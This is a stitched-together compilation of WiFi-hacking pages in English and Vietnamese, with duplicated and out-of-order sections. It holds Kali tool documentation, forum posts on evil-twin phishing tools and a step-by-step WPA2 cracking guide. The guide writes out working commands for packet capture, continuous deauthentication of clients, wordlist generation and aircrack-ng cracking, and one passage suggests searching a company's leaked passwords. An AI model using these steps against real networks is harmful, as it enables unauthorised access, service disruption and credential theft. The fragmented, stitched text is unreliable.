We have bad news for you. It is almost certain that your onboard network card is incapable of this. You will need to purchase an external network adapter – and it has to have these specific (and uncommon) abilities.
For this article, we will be using Kali Linux with the ALFA AWUS036NEH Long Range adapter. This particular adapter is now end-of-life and discontinued, but it still serves its purpose. You can see our top choices for Kali Linux-compatible WiFi adapters here.
Specifically, we are using this adapter with Kali Linux 2022.4 running in VirtualBox on a Razer Blade 15 2018 Basic laptop.
Set Up Kali
If you don’t have Kali Linux installed, see our article How To Install Kali Linux on VirtualBox.
To connect your wireless adapter, follow these steps.
First, make sure your virtual machine instance is shut down.
Next, plug in your USB network adapter.
Now go to the VirtualBox manager. Select your Kali instance, click the list icon, and choose Details.
You will now see a page giving you various details about your virtual machine instance, such as the base memory, any shared folders connected to it, and the hard disk details.
Click on USB to bring up the USB settings menu. Now click the green plus sign on the right-hand side.
You want to add your new network adapter. It may not list the manufacturer, but instead list the chipset, as you can see in our image below. Once selected, click OK.
Back on the manager Windows, click Network this time. We want to disable all network adapters for this virtual machine, so unclick Enable Network Adapter in all four tabs. Click OK. Now all communication will be through our wireless card.
Once done, Kali is ready.
Different Wireless Technologies
We won’t go into the entire history of the 802.11 wireless standards. Instead, we’re just going to talk about encryption.
There are several encryption types to choose from when securing a wireless network. Those include
- WEP
- WPA
- WPA2
- WPA2 Enterprise
WEP stands for Wired Equivalent Privacy. Despite the name, it is far from being as private as a wired connection. This is completely depreciated, as it can be hacked in literally seconds. Some routers will still come with it as an option for legacy reasons. Never use it. Most businesses know better. If you see it on a penetration test, you can clock out early that afternoon, as it is the easiest wireless hack you’ll ever perform.
The common encryption methods you will run into are WPA2 and WPA2 Enterprise. The difference between them, in a very high-level and simplified explanation, is the Enterprise version will have a secure login for every member of the domain. This means instead of one password to access the WiFi for everyone (like you would see at home), each user would have their own username and password.
Attacking WPA2 Enterprise is beyond the scope of this article. Many businesses small to medium-sized businesses and any home routers are likely to be set to WPA2, which is what we will be hacking today.
What Are Dictionary Attacks?
A dictionary attack is the process of running through a preset list of words to see if any match the password you are looking to crack. For this, you need a password list to try.
This differs from a brute force attack, which tries every combination of characters based on the rules you prescribe. For example, if you know the password is between six and eight characters and contains upper and lower case letters and numbers but no special characters, the brute force attack might try “Aaaaa1,” “AAaaa1,” “AAAaa1,” etc., until it finds a match.
Each attack has its benefits and drawbacks. A dictionary attack is guaranteed to work eventually. The problem is a complex password (12 characters, upper and lower case letters with numbers and symbols) could literally take tens of thousands of years to crack with current technology. We doubt you’ll want to sit for this long looking to get WiFi access.
A dictionary attack is only as strong as its password list. However, if the password is on that list, the cracking will be much faster. There are many bad password policies in place, and while people are getting better at protecting their email and other online accounts, things like WiFi still take a back seat.
For our lab, we will be using a password list included with Kali Linux. You can find it here:/usr/share/wordlists/fern-wifi/common.txt
It contains 477 passwords, which is fine for our practice lab. When trying this for real, have many different password lists handy. Start with the smaller ones and hope for a quick win, if it doesn’t work, try larger ones. You can always see if the company has had a security breach before, you might find some passwords they’ve used in the past sitting online.
besside-ng
Attack WPA only (
-W
), display verbose output (
-v
) and use monitor mode interface
wlan0mon
.
root@kali:~# besside-ng -W -v wlan0mon [18:39:34] mac 3c:46:d8:4e:ef:aa [18:39:34] Let's ride [18:39:34] Appending to wpa.cap [18:39:34] Appending to wep.cap [18:39:34] Logging to besside.log [18:39:35] Found AP 44:3a:cb:38:51:42 [watwutwot] chan 1 crypto WPA dbm -49 [18:39:35] Found AP 4c:8b:30:83:ed:91 [TELUS3079-2.4G] chan 1 crypto WPA dbm -71 [18:39:35] Found AP 1c:87:2c:d3:34:18 [Kuroki] chan 3 crypto WPA dbm -89 [18:39:37] Found AP 4c:8b:30:24:71:75 [SAMUEL9] chan 8 crypto WPA dbm -73 [18:39:37] Found AP 0c:51:01:e6:01:c4 [fbi-van-24] chan 11 crypto WPA dbm -46 [18:39:37] Found AP 70:f1:96:8e:5c:02 [TELUS0455-2.4G] chan 11 crypto WPA dbm -78 [18:39:38] Found client for network [Kuroki] 90:06:28:cb:0f:f3 [18:39:41] Found AP f0:f2:49:3c:ec:a8 [fbi-van-24] chan 1 crypto WPA dbm -49 [18:39:42] Found AP bc:4d:fb:2c:6d:88 [SHAW-2C6D80] chan 6 crypto WPA dbm -77 [18:39:42] Found client for network [SHAW-2C6D80] 64:5a:04:98:e1:62 [18:39:43] Found AP 10:78:5b:e9:a4:e2 [TELUS2151] chan 11 crypto WPA dbm -49 [18:39:43] Found client for network [fbi-van-24] 60:6b:bd:5a:b6:6c
Conclusion
Let’s summarise what you’ve learned:
- Change the wireless adaptor to monitor mode using airmon-ng
- Scan for the target AP using airodump-ng and capture the packets
- Perform a DOS attack on the AP to get the handshake packets
- End the DOS once you have verified you captured the necessary packet
- Use aircrack-ng to generate PMKs to run against the handshake packets
Sometimes, the password may not be in the wordlist. In that case, there are many other ways to get the password such as an Evil Twin Attack or variations of what you have learned here. I also encourage you to practice this and many other attacks you discover out there, as this helps make you a master hacker.
Remember, this is strictly for educational purposes. Only perform this on others with their consent, or on your own devices.
And with that, we have come to the end of this article. Hope you enjoyed it. And as I always say, Happy hacking! 🙃
Resources
Acknowledgements
Thanks to Anuoluwapo Victor, Chinaza Nwukwa, Holumidey Mercy, Favour Ojo, Georgina Awani, and my family for the inspiration, support and knowledge used to put this post together. You’re my unsung heroes.
Cover photo credit: Lego Gentlemen working on a router from Wallpaperflare.com
Tool Documentation:
airodump-ng-oui-update Usage Example
airodump-ng-oui-update does not have any options. Run the command and wait for it to complete.
root@kali:~# airodump-ng-oui-update /usr/sbin/update-ieee-data Updating /var/lib/ieee-data//oui.txt Checking permissions on /var/lib/ieee-data//oui.txt Downloading https://standards.ieee.org/develop/regauth/oui/oui.txt to /var/lib/ieee-data//oui.txt Checking header Temporary location /tmp/ieee-data_y1vJ3E to be moved to /var/lib/ieee-data//oui.txt /var/lib/ieee-data//oui.txt updated. Updating /var/lib/ieee-data//mam.txt Checking permissions on /var/lib/ieee-data//mam.txt Downloading https://standards.ieee.org/develop/regauth/oui28/mam.txt to /var/lib/ieee-data//mam.txt Checking header Temporary location /tmp/ieee-data_y1vJ3E to be moved to /var/lib/ieee-data//mam.txt /var/lib/ieee-data//mam.txt updated. Updating /var/lib/ieee-data//oui36.txt Checking permissions on /var/lib/ieee-data//oui36.txt Downloading https://standards.ieee.org/develop/regauth/oui36/oui36.txt to /var/lib/ieee-data//oui36.txt Checking header Temporary location /tmp/ieee-data_y1vJ3E to be moved to /var/lib/ieee-data//oui36.txt /var/lib/ieee-data//oui36.txt updated. Updating /var/lib/ieee-data//iab.txt Checking permissions on /var/lib/ieee-data//iab.txt Downloading https://standards.ieee.org/develop/regauth/iab/iab.txt to /var/lib/ieee-data//iab.txt Checking header Temporary location /tmp/ieee-data_y1vJ3E to be moved to /var/lib/ieee-data//iab.txt /var/lib/ieee-data//iab.txt updated. Updating /var/lib/ieee-data//oui.csv Checking permissions on /var/lib/ieee-data//oui.csv Downloading https://standards.ieee.org/develop/regauth/oui/oui.csv to /var/lib/ieee-data//oui.csv Checking header Temporary location /tmp/ieee-data_y1vJ3E to be moved to /var/lib/ieee-data//oui.csv /var/lib/ieee-data//oui.csv updated. Updating /var/lib/ieee-data//mam.csv Checking permissions on /var/lib/ieee-data//mam.csv Downloading https://standards.ieee.org/develop/regauth/oui28/mam.csv to /var/lib/ieee-data//mam.csv Checking header Temporary location /tmp/ieee-data_y1vJ3E to be moved to /var/lib/ieee-data//mam.csv /var/lib/ieee-data//mam.csv updated. Updating /var/lib/ieee-data//oui36.csv Checking permissions on /var/lib/ieee-data//oui36.csv Downloading https://standards.ieee.org/develop/regauth/oui36/oui36.csv to /var/lib/ieee-data//oui36.csv Checking header Temporary location /tmp/ieee-data_y1vJ3E to be moved to /var/lib/ieee-data//oui36.csv /var/lib/ieee-data//oui36.csv updated. Updating /var/lib/ieee-data//iab.csv Checking permissions on /var/lib/ieee-data//iab.csv Downloading https://standards.ieee.org/develop/regauth/iab/iab.csv to /var/lib/ieee-data//iab.csv Checking header Temporary location /tmp/ieee-data_y1vJ3E to be moved to /var/lib/ieee-data//iab.csv /var/lib/ieee-data//iab.csv updated. Running parsers from /var/lib/ieee-data//update.d
airtun-ng Usage Examples
wIDS
Specify the BSSID of the access point you wish to monitor (
-a DE:AD:BE:EF:CA:FE
) and its WEP key (
-w 1234567890
).
root@kali:~# airtun-ng -a DE:AD:BE:EF:CA:FE -w 1234567890 wlan0mon created tap interface at0 WEP encryption specified. Sending and receiving frames through wlan0mon. FromDS bit set in all frames.
airgraph-ng Usage Examples
CAPR graph
Specify the input file to use (
-i dump-01.csv
), the output file to generate (
-o capr.png
) and the graph type (
-g CAPR
).
root@kali:~# airgraph-ng -i dump-01.csv -o capr.png -g CAPR **** WARNING Images can be large, up to 12 Feet by 12 Feet**** Creating your Graph using, dump-01.csv and writing to, capr.png Depending on your system this can take a bit. Please standby......
CPG graph
Specify the input file to use (
-i dump-01.csv
), the output file to generate (
-o cpg.png
) and the graph type (
-g CAG
).
root@kali:~# airgraph-ng -i dump-01.csv -o cpg.png -g CPG **** WARNING Images can be large, up to 12 Feet by 12 Feet**** Creating your Graph using, dump-01.csv and writing to, cpg.png Depending on your system this can take a bit. Please standby......
What is a Packet?
A Packet is the basic unit/building block of data in a computer network. When data is transferred from one computer to another, it is broken down and sent in packets.
Think of packets like Lego building blocks. You (the computer) receive the complete set (the complete data) in pieces (packets) from the seller (another computer). You will then assemble the blocks together to build up the figure based on the instructions given in order to enjoy it (or in this case, for the whole data to make sense).
A packet, also known as a datagram, is made up of two basic parts:
- A Header
- The Payload/Data
The Header contains information about the packet. This helps the network and the receiving computer know what to do with it, such as the source and destination IP addresses.
The Payload is the main content the packet contains. It’s also worth mentioning that packets can be encrypted so that their data can’t be read if gotten by an attacker.
In a network, packets are a requirement for packet switching. Packet switching means breaking down data into packets and sending them to various computers using different routes. When received, the computers can then assemble these packets to make sense of it all. The Internet is the largest known packet switching network on earth.
Now let’s see how we can apply this knowledge to wireless networks.
airgraph-ng Usage Examples
CAPR graph
Specify the input file to use (
-i dump-01.csv
), the output file to generate (
-o capr.png
) and the graph type (
-g CAPR
):
root@kali:~# airgraph-ng -i dump-01.csv -o capr.png -g CAPR **** WARNING Images can be large, up to 12 Feet by 12 Feet**** Creating your Graph using, dump-01.csv and writing to, capr.png Depending on your system this can take a bit. Please standby......
CPG graph
Specify the input file to use (
-i dump-01.csv
), the output file to generate (
-o cpg.png
) and the graph type (
-g CAG
):
root@kali:~# airgraph-ng -i dump-01.csv -o cpg.png -g CPG **** WARNING Images can be large, up to 12 Feet by 12 Feet**** Creating your Graph using, dump-01.csv and writing to, cpg.png Depending on your system this can take a bit. Please standby......
Mitigations Against WiFi Attacks
Basic Wi-Fi security should cover this attack from a defensive perspective. Using WPA3 which is a newer protocol is your best bet against such an attack. To mitigate against de-authentication attacks, use an ethernet connection if possible.
Assuming that option is not on the table, you can use a strong passphrase (not a password) to minimise the attackers chances of getting it. A passphrase is a string of words simply used as a password. Passphrases tend to be longer than passwords, easier to remember, and are a rarer practice. Therefore, they will hardly be found in wordlists.
For example, ‘mercury’ is more likely to be found in a wordlist than ‘mercurylovespluto’. The later is a 15-character passphrase and as simple as it is, it would be hard for an attacker to find, guess, or generate.
Another mitigation would be to disable WPS (Wi-Fi Protected Setup) and avoid under any circumstance using a router that uses the WEP protocol. You’d just be asking for unwanted attention as it’s a lot easier to hack both of these than WPA2.
Disclaimer
We want to be absolutely clear on this point. As much fun as it might seem to hack into your neighbor’s wireless network or a secured network at a friend’s house, hotel, or other location, don’t do it. You need to have permission from the network owner if you are to do any kind of hacking or penetration testing on their systems.
It might not seem like a big deal, but hacking a system without permission can hold extremely steep legal penalties, including jail time, depending on your location. Such laws include:
- The Computer Fraud and Abuse Act (United States)
- Sections 184, 342.1, 380, and 430 of the Criminal Code of Canada (Canada)
- Computer Misuse Act 1990 (England)
- Sec. 202a and 202b of the German Criminal Code (Germany)
- Information Technology Act Sec. 43 and 66 (India)
- The Act on the Prohibition of Unauthorised Computer Access (Japan)
wesside-ng Usage Example
Use the specified monitor mode interface (
-i wlan0mon
) and target a single BSSID (
-v de:ad:be:ef:ca:fe
):
root@kali:~# wesside-ng -i wlan0mon -v de:ad:be:ef:ca:fe [18:31:52] Using mac 3C:46:D8:4E:EF:AA [18:31:52] Looking for a victim... [18:32:13] Chan 04 -
Screenshots
fern-wifi-cracker
Packages and Binaries:
fern-wifi-cracker
This package contains a Wireless security auditing and attack software program written using the Python Programming Language and the Python Qt GUI library, the program is able to crack and recover WEP/WPA/WPS keys and also run other network based attacks on wireless or ethernet based networks.
Installed size:
1.13 MB
How to install:
sudo apt install fern-wifi-cracker
- aircrack-ng
- macchanger
- python3
- python3-pyqt5
- python3-scapy
- reaver
- subversion
- xterm | x-terminal-emulator
fern-wifi-cracker
Updated on: 2022-Aug-05
Thảo luận chung về hack Wifi bằng Kali linux 2019.3
Chào mọi người, mình đang có thắc mắc về hack wifi bằng kali linuxHiện tại theo như mình có tìm hiểu và có thực tế trải nghiệm test thử thì có 2 phương pháp hack chính:Đó là1.Hack sử dụng từ điển
Hiện tại theo như mình có tìm hiểu và có thực tế trải nghiệm test thử thì có 2 phương pháp hack chính:
Đó là
1.Hack sử dụng từ điển
- Ưu điểm: Áp dụng cho những wifi đặt pass thông dụng, k có tính bảo mật cao
- Nhược điểm: Cần tới những bộ từ điển nặng 2-3GB, mất thời gian nạp&quét thử, password không nằm trong đúng bộ từ điển thì vừa mất time, vừa mất công hụt hẫng hi vọng chờ đợi
- Ưu điểm: Đánh nhanh thắng nhanh, không mất time chờ đợi lâu như phương pháp 1
-
Nhược điểm: Hiện tại theo như những tool mình đã từng sử dụng như fluxion, wifiphisher và mới đây là airgeddon (tất cả đều có trên github) thì mình có đánh giá là chúng không thực sự hiệu quả như mình từng nghĩ
- Cụ thể từ đầu tới phần bắt shake capture rồi fake thành wifi giả có SSID giống với wifi gốc thì mọi thứ đều OK, sau đó mình có lấy điện thoại ra test thử, xác nhận thấy có wifi fake + để yên tâm mình cũng có test thêm bằng cách thử ấn vào wifi fake, connect thử các kiểu tới màn hình nhập pass thì vẫn OK, tuy nhiên sau đó thì mình đợi hoài không thấy có client login vào, mặc dù theo như mình quan sát thì các tool trên đều mở terminal gửi deauth packet thông qua mdk3 hoặc aireplay-ng tới các client đang connect sẵn trong wifi gốc để đẩy client đó ra khỏi wifi gốc, khiến client đó phải vào setting trên smartphone và connect lại vào wifi fake.
- Mình đang nghĩ là thực tế các client vẫn chưa bị đẩy ra khỏi wifi gốc >> Mình đang kết luận là phương pháp 2 này chưa thực sự tối ưu
Hiện mình cần các PRO tư vấn là nguyên nhân tại sao và nếu có phương pháp nào khác tối ưu hơn thì nhờ các PRO tư vấn ạ.Đội ơn các bác rất nhiều ạ.(Chú thích: nhà mình cũng có wifi, mình cũng có test thử trên chính wifi nhà mình, có thấy bị văng ra khỏi wifi gốc nhưng sau đó nó lại tự connect lại, ngoài ra do nhà mình cũng có wifi rồi, nên việc hack này chỉ là mình tự tìm hiểu và đam mê mày mò thôi nhé các bác, các bác đừng gạch đá em tội nghiệp)
Đội ơn các bác rất nhiều ạ.
(Chú thích: nhà mình cũng có wifi, mình cũng có test thử trên chính wifi nhà mình, có thấy bị văng ra khỏi wifi gốc nhưng sau đó nó lại tự connect lại, ngoài ra do nhà mình cũng có wifi rồi, nên việc hack này chỉ là mình tự tìm hiểu và đam mê mày mò thôi nhé các bác, các bác đừng gạch đá em tội nghiệp)
DDos
VIP Members
[Kali Linux 2.0] Linset — Crack WPA/WPA2 Wifi Password không cần brute force
Nếu bạn đang sử dụng Kali Linux 1.x các bạn xem ở topic này.Linset là một bash script được viết bởi một người Tây Ban Nha với mục đích tự động hóa qúa trình crack mật khẩu wifi không cần tới việc sử dụng wordlist. Ý tưởng là tạo ra một điểm truy cập gỉa mạo sử dụng airbase-ng nhằm đánh lừa người dùng để kết nối tới điểm truy cập này. Với điểm truy cập thật, bạn sẽ không thể kết nối tới nó bởi vì aireply-ng đã gửi các gói tin de-authentication tới nó. Khi người dùng kết nối tới điểm truy cập gỉa mạo, họ vẫn có thể truy cập Internet bình thường (nếu kẻ tấn công có ý đồ ngoài việc lấy mật khẩu wifi). Nếu mục đích chỉ là lấy mật khẩu wifi thì khi người dùng truy cập tới bất kỳ một địa chỉ web, trình duyệt của họ sẽ bị điều hướng tới trang web của kẻ tấn công đã thiết lập sẵn và yêu cầu họ nhập mật khẩu wifi của điểm truy cập này (bởi vì điểm truy cập thật đã không thể kết nối và AP giả mạo giống hệt với AP thật nên người dùng rất dễ nhầm lẫn)Khi họ nhập đúng mật khẩu của AP thật, Linset sẽ kết thúc quá trình chạy và hiển thị mật khẩu của điểm truy cập này. Điều hay ở script này là để sử dụng bạn chỉ cần 1 card wifi, không yêu cầu 2 card wifi như các công cụ khác (wifiphisher,…)Nhưng không may mắn, Linset chỉ hoạt động trên Kali Linux 1.x (hay đúng hơn là tương thích với phiên bản aircrack-ng cũ). Hôm trước tình cờ lang thang trong forum về Kali Linux ở Indonexia, thấy họ đã edit lại script này để nó hoạt động tốt trên kali linux 2.0) Các bạn có thể tải nó về tại đây. Script ban đầu là tiếng Tây Ban Nha, nhưng đã được dịch lại sang tiếng Anh.
Yêu cầu để chạy Linset:Công cụ này sử dụng rất dễ dàng, các bạn chỉ cần chọn và chọn là xong. Mình có làm demo về công cụ này:
Linset là một bash script được viết bởi một người Tây Ban Nha với mục đích tự động hóa qúa trình crack mật khẩu wifi không cần tới việc sử dụng wordlist. Ý tưởng là tạo ra một điểm truy cập gỉa mạo sử dụng airbase-ng nhằm đánh lừa người dùng để kết nối tới điểm truy cập này. Với điểm truy cập thật, bạn sẽ không thể kết nối tới nó bởi vì aireply-ng đã gửi các gói tin de-authentication tới nó. Khi người dùng kết nối tới điểm truy cập gỉa mạo, họ vẫn có thể truy cập Internet bình thường (nếu kẻ tấn công có ý đồ ngoài việc lấy mật khẩu wifi). Nếu mục đích chỉ là lấy mật khẩu wifi thì khi người dùng truy cập tới bất kỳ một địa chỉ web, trình duyệt của họ sẽ bị điều hướng tới trang web của kẻ tấn công đã thiết lập sẵn và yêu cầu họ nhập mật khẩu wifi của điểm truy cập này (bởi vì điểm truy cập thật đã không thể kết nối và AP giả mạo giống hệt với AP thật nên người dùng rất dễ nhầm lẫn)Khi họ nhập đúng mật khẩu của AP thật, Linset sẽ kết thúc quá trình chạy và hiển thị mật khẩu của điểm truy cập này. Điều hay ở script này là để sử dụng bạn chỉ cần 1 card wifi, không yêu cầu 2 card wifi như các công cụ khác (wifiphisher,…)
Nhưng không may mắn, Linset chỉ hoạt động trên Kali Linux 1.x (hay đúng hơn là tương thích với phiên bản aircrack-ng cũ). Hôm trước tình cờ lang thang trong forum về Kali Linux ở Indonexia, thấy họ đã edit lại script này để nó hoạt động tốt trên kali linux 2.0) Các bạn có thể tải nó về tại đây. Script ban đầu là tiếng Tây Ban Nha, nhưng đã được dịch lại sang tiếng Anh.
Yêu cầu để chạy Linset:
- Kai Linux 2.0 (hoặc bất kỳ một bản phần phối Linux nào có cài aircrack-ng)
- 1 card wirelss
- 1 kết nối Internet qua mạng dây
Công cụ này sử dụng rất dễ dàng, các bạn chỉ cần chọn và chọn là xong. Mình có làm demo về công cụ này:
Chỉnh sửa lần cuối bởi người điều hành:
Cyber Security Tool For Hacking Wireless Connections Using Built-In Kali Tools. Supports All Securities (WEP, WPS, WPA, WPA2/TKIP/IES) hacking is not a crime it’s a skills .
-
Updated
Jan 28, 2024
- Python
Cyber Security Tool For Hacking Wireless Connections Using Built-In Kali Tools. Supports All Securities (WEP, WPS, WPA, WPA2/TKIP/IES) hacking is not a crime it’s a skills .
Add a description, image, and links to the hack-wifi-kali-linux topic page so that developers can more easily learn about it.
To associate your repository with the hack-wifi-kali-linux topic, visit your repo’s landing page and select “manage topics.”
Giới thiệu
Làm thế nào để hack password wifi, chắc hẳn rất nhiều bạn quan tâm đến vấn đề này. Hôm nay tôi sẽ viết bài hướng dẫn hack password wifi bằng Kali Linux.
Hiện nay có 3 chuẩn bảo mật Wifi đang được sử dụng: WEP, WPA, WPA2. Nếu bạn đã từng vào trang cấu hình của Router (thông thường ở địa chỉ 192.168.1.1), bạn có thể lựa chọn 1 trong 3 chuẩn bảo mật này. Trong đó chuẩn WEP đã lỗi thời và hầu như không còn được sử dụng trong thực tế nữa nên tôi sẽ không giới thiệu phương pháp tấn công chuẩn WEP ở đây. Trong những điều kiện thích hợp ta có thể hack wifi chuẩn WEP trong vài phút với tỉ lệ thành công 99%, phương pháp tấn công dựa vào lỗ hỗng trong bản thân chuẩn bảo mật này.
WPA2 là chuẩn mới nhất, phương pháp tấn công chủ yếu dựa vào wordlist nên tỉ lệ thành công dựa vào độ mạnh của mật khẩu do admin đặt. Thế nhưng năm 2017, các chuyên gia bảo mật đã phát hiện lỗ hổng bảo mật nghiêm trọng trong chuẩn kết nối WPA2 và giới thiệu phương pháp tấn công KRACK (Key Reinstallation Attack) khiến cho WPA2 không còn an toàn nữa.
Đầu năm 2018, các nhà phát triển đã giới thiệu chuẩn bảo mật mới WPA3 và trong tương lai các nhà sản xuất phần cứng sẽ update chuẩn mới này. Tuy nhiên bạn yên tâm là trong vòng 5 năm tiếp theo chuẩn WPA3 cũng chưa thể phổ biến toàn cầu được, và phương pháp tấn công chuẩn WPA/WPA2 trong bài viết sẽ chưa lỗi thời trong ít nhất 5 năm nữa 🙂
Phương pháp tấn công
Phần này mang tính lý thuyết, sẽ giúp bạn hiểu được quá trình tấn công diễn ra như thế nào.
Khi một client muốn kết nối đến Router được cài đặt chuẩn bảo mật WPA/WPA2 để truy cập internet nó cần có PSK (Pre-shared Key) mà ta hay gọi là password. Client cần có cách để chứng minh với Router rằng nó biết password mà không trực tiếp gửi password qua Router (để tránh có kẻ thứ 3 bắt được gói tin này và thu được password). Quá trình xác thực trải qua 4 bước (4-way handshake – giao thức bắt tay 4 bước):
- Client dò mạng và thấy sóng public của Router, trong sóng này có cái mã Random là ANonce.
- Client lấy cái ANonce, qua quá trình tính toán tính ra được cái mã SNonce, và gửi đi SNonce cùng một số thông tin đã được mã hóa như tao là ai, tao có password wifi nè, … cho Router.
- Router nhận được SNonce, nó bảo: à há, thằng này biết password wifi nè, cho nó kết nối thôi. Nó hăm hở gửi lại cho client 1 cái mã khóa chung gọi là GTK (Group Temporary Key) và bảo rằng, ê thằng đệ, lấy cái Key này về mà mã hóa dữ liệu gửi cho tao, tao sẽ biết đường mã giải mã.
- Client nhận được cái GTK sẽ lưu lại (Installation), liền dùng nó mã hóa 1 cái thư gửi lại cho Router với nội dung ACK thông báo cho Router rằng tao nhận được khóa rồi, vui quá mày ơi. Từ đó 2 thằng dùng cái mã khóa chung này để gửi và nhận dữ liệu.
Phương pháp tấn công ở đây là ta sẽ bắt các gói tin trong quá trình 4-way handshake này để thu được cái mật khẩu ở dạng mã hash. Không có cách nào để thu lại được password gốc từ mã hash này vì đây là mã một chiều. Đây là lúc áp dụng Wordlist Attack, tức là ta sẽ tạo wordlist chứa danh sách các password tiềm năng, rồi chuyển chúng thành mã hash. Sau đó so sánh từng mã hash này với cái mã hash đã thu được từ đó suy ra được password ban đầu. OK lý thuyết có nhiêu đó thôi, bắt đầu thực hành nhé.
Chuẩn bị
Để áp dụng được phương pháp tấn công trong bài viết, bạn cần có những thứ sau:
- Hệ điều hành Kali Linux (nên update lên phiên bản mới nhất để tối ưu hóa cuộc tấn công).
- Laptop có card wifi hỗ trợ chế độ monitor (search google để check nhé).
- Bộ chương trình aircrack-ng để hack wifi (được cài đặt sẵn trên Kali Linux).
- Một wordlist (từ điển password) tốt, có thể tải từ internet hoặc tự tạo bằng các chương trình như crunch, cupp, …
- Một tí may mắn 🙂
Bắt đầu nào!
Attack – Step 1: Capture the 4-way Handshake packets.
Đầu tiên, bạn vào Kali Linux, mở Terminal lên, gõ lệnh sau để xem các card mạng đang có trong máy:
ifconfig
Như hình trên,
eth0
là card mạng có dây
lo
bạn không cần quan tâm,
wlan0
là card wireless sẽ dùng để hack, bạn có thể thấy địa chỉ IP của máy Kali (nếu bạn đã kết nối wifi) là 192.168.12.109 và địa chỉ MAC là 56:0F:1C:93:EB:B2.
Card wireless có 2 chế độ, chế độ mặc định là Managed, card mạng sẽ chỉ thu nhận những gói dữ liệu (packets) được gửi đi trong không khí mà có địa chỉ nhận là máy của ta. Chế độ còn lại là Monitor, lúc này card mạng sẽ thu nhận tất cả các packets được gửi đi từ các card wireless khác trong phạm vi bắt sóng, bất kể địa chỉ nhận là gì.
Để chuyển sang chế độ Monitor bạn gõ lệnh
airmon-ng start wlan0
Khi đó card wireless sẽ đổi tên thành wlan0mon, bạn có thể gõ lệnh
ifconfig
lại để check card mạng.
Bạn gõ tiếp lệnh sau để card mạng thăm dò các packets trong không khí nhằm xác định các AP (Access Point) và các client kết nối đến chúng.
airodump-ng wlan0mon
Phần trên là các AP bắt sóng được, phần dưới là các client kết nối đến AP này. Bạn chú ý cột ESSID là tên của AP, cột ENC cho biết phương pháp mã hóa (bạn có thể thấy WPA2 chiếm đa số, và hầu như không có WEP), cột CH là channel mà AP phát sóng, BSSID là địa chỉ MAC của AP.
Khi đã tìm được AP mục tiêu mà ta cần tấn công, nhấn Ctrl + C để dừng quá trình dò mạng. Ở đây tôi chọn AP có ESSID là “Ngoai Tieu Hoa”. Gõ tiếp lệnh sau để chỉ bắt các gói tin thuộc AP mà ta mong muốn:
airodump-ng --bssid B0:48:7A:9A:E6:36 -c 4 -w ngoaitieuhoa wlan0mon
Trong đó:
-
B0:48:7A:9A:E6:36
là địa chỉ MAC của AP - -c 4 là channel mà AP phát sóng
- -w ngoaitieuhoa là tên file mà ta muốn viết
- wlan0mon là tên card wifi ở chế độ monitor
Lệnh trên sẽ bắt các gói tin đi và đến AP có địa chỉ MAC: B0:48:7A:9A:E6:36 trên channel … và ghi lại các gói tin bắt được vào file .cap có tên bắt đầu là ngoaitieuhoa…
Lúc này ta sẽ chờ đợi khi có client nào connect đến AP nó sẽ bắt được quá trình 4-way handshake và dòng chữ WPA Hanshake sẽ hiện ở góc trên phải của terminal. File ngoaitieuhoa…cap sẽ được lưu trong /root.
Để đảm bảo quá trình nghe lén này thành công ta mở 1 terminal khác và gõ lệnh sau để ngắt kết nối các client đang kết nối với AP. Khi đó client sẽ thực hiện lại 4-way handshake và ta sẽ bắt được gói tin cần thiết.
aireplay-ng --deauth 0 -a B0:48:7A:9A:E6:36 wlan0mon
Trong đó:
- –deauth 0: thực hiện tấn công ngắt kết nối liên tục đến các client của mạng này.
-
-a
B0:48:7A:9A:E6:36
là địa chỉ MAC của AP. - wlan0mon là tên card wireless ở chế độ monitor.
Quan sát cửa sổ đang chạy lệnh airodump-ng, đến khi hiện chữ “WPA Handshake” thì coi như đã hoàn thành bước 1: bắt gói tin. Ta có thể Ctrl + C tại các cửa sổ để dừng lệnh lại.
Attack – Step 2: Wordlist
Bước tiếp theo trong quá trình tấn công là tiến hành wordlist attack. Ta cần có một bộ từ điển tốt để hack.
Trong Kali, đã có sẵn một số wordlist, ví dụ wordlist rockyou.txt nằm tại địa chỉ
/usr/share/wordslists/rockyou.txt
hoặc wordlist của John the Riper tại
/usr/share/john/password.lst
, … nhưng đa số các wordlist này không phù hợp với người Việt Nam do đặc điểm ngôn ngữ khác biệt.
Một số wordlist được tạo sẵn dành cho người Việt có thể tải từ link sau:
https://drive.google.com/drive/folders/1xucDD6sy6DTH-IAvKdaVQkAkI3tSHfIe
Hoặc bạn có thể tự tạo wordlist bằng chương trình crunch có sẵn của Kali Linux.
Câu lệnh sau sẽ tạo wordlist gồm 8 chữ số (password thông dụng tại các quán cafe) trong vòng vài giây:
crunch 8 8 0123456789 -o wordlist8so.txt
File wordlist vừa tạo nặng 858 Mb! Bạn có thể tìm hiểu thêm về chương trình crunch bằng cách gõ
crunch --help
Một cách khác khá hay để tạo wordlist là chương trình cupp viết bằng python, tạo wordlist dựa trên thông tin về đối tượng cần hack như: họ tên, ngày sinh, tên người yêu, tên thú nuôi, … Tìm hiểu thêm tại đây:
https://hackingvision.com/2017/12/13/cupp-target-specific-wordlist-generator/
Sau khi có wordlist rồi thì chuyển sang bước 3 nhé. Chú ý là ta sẽ phải thử nhiều wordlist đấy, phụ thuộc vào độ may mắn của bạn.
Attack – Step 3: Crack
Ở bước này chỉ cần 1 lệnh đơn giản:
aircrack-ng ngoaitieuhoa-01.cap -w wordlist8so.txt
Lệnh này sẽ tiến hành tạo mã hash cho mỗi password trong wordlist và tiến hành so sánh với password đã hash bắt được trong file ngoaitieuhoa-01.cap. Thay wordlist8so.txt bằng đường dẫn đến file wordlist đã chuẩn bị ở bước 2. Kết quả test trên máy tác giả:
Tốc độ crack trên máy tác giả (CPU core i5, RAM 4Gb) là khoảng 2400 keys/s. Như vậy để dò hết wordlist chứa 8 chữ số sẽ mất khoảng tối đa 10^8 / 2400 / 3600 ≈ 12 giờ (kiên nhẫn nhé :)). Khi dò ra password chương trình sẽ hiện lên: Key Found: … và cho bạn biết password cần tìm.
Lời kết
Bạn có thể thấy tốc độ dò pass như trên là khá chậm. Có một số cách để tăng tốc độ dò pass như dựa vào sức mạnh của card đồ họa (GPU) hay dựa vào sức mạnh của điện toán đám mây (cloud). Tôi sẽ giới thiệu trong 1 bài khác nếu có dịp.
Phương pháp tấn công bên trên dựa vào wordlist nên tỉ lệ thành công không được cao lắm. Ở bài sau tôi sẽ giới thiệu một phương pháp tấn công khác là tấn công dựa trên tính năng WPS của Router.
Chúc may mắn với aircrack-ng 🙂
When it comes to learning pentesting, one of the most frequently asked questions we receive is, “how do I hack WiFi?” It is often the first hands-on challenge aspiring hackers want to try. Your being here is proof positive.
